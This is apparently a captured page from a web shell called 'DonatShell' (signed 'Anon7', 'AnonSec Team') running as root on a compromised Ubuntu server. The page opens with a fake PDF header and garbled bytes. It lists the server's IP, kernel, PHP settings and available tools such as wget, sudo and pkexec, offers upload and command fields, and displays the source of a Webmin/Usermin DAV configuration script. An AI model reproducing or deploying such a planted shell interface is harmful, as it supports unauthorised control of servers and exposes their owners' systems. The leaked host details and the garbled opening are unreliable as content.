%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 49.231.201.246  /  Your IP : 216.73.216.149
Web Server : Apache/2.4.18 (Ubuntu)
System : Linux 246 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
User : root ( 0)
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/thread-self/root/usr/share/webmin/usermin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /proc/thread-self/root/usr/share/webmin/usermin/save_dav.cgi
#!/usr/bin/perl
# Save DAV server options

require './usermin-lib.pl';
&error_setup($text{'dav_err'});
&get_usermin_miniserv_config(\%miniserv);
&ReadParse();

if ($in{'path_def'}) {
	delete($miniserv{'davpaths'});
	}
else {
	$in{'path'} =~ /^\/\S/ || &error($text{'dav_epath'});
	$miniserv{'davpaths'} = $in{'path'};
	}

if ($in{'root_def'} == 0) {
	delete($miniserv{'dav_root'});
	}
elsif ($in{'root_def'} == 1) {
	$miniserv{'dav_root'} = '*';
	}
else {
	-d $in{'root'} || &error($text{'dav_eroot'});
	$miniserv{'dav_root'} = $in{'root'};
	}

if ($in{'users_def'}) {
	delete($miniserv{'dav_users'});
	}
else {
	$in{'users'} =~ /\S/ || &error($text{'dav_eusers'});
	$miniserv{'dav_users'} = join(" ", split(/\s+/, $in{'users'}));
	}

if (!defined($miniserv{'dav_remoteuser'})) {
	$miniserv{'dav_remoteuser'} = 1;
	}

# Update config
&lock_file($usermin_miniserv_config);
&put_usermin_miniserv_config(\%miniserv);
&unlock_file($usermin_miniserv_config);
&restart_usermin_miniserv();
&webmin_log("dav");
&redirect("");


Anon7 - 2022
AnonSec Team